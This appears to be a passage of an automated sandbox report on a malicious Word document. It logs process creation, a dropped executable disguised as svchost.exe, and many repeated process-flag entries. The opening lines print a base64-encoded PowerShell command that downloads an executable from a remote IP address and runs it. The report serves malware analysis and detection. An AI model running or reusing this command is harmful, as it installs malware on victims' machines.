        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244DE6C push ebp; retf 7_2_0244DE6F
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244CD12 push ebx; iretd 7_2_0244CD37
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244CB19 pushad ; iretd 7_2_0244CB1A
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244FC2D push esp; retf 7_2_0244FC30
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244CB97 push ebx; iretd 7_2_0244CD37
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_02451AA2 push 94B57A95h; iretd 7_2_02451AB6

        Persistence and Installation Behavior

        barindex
        Drops PE files with benign system names
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\timeout.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\timeout.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
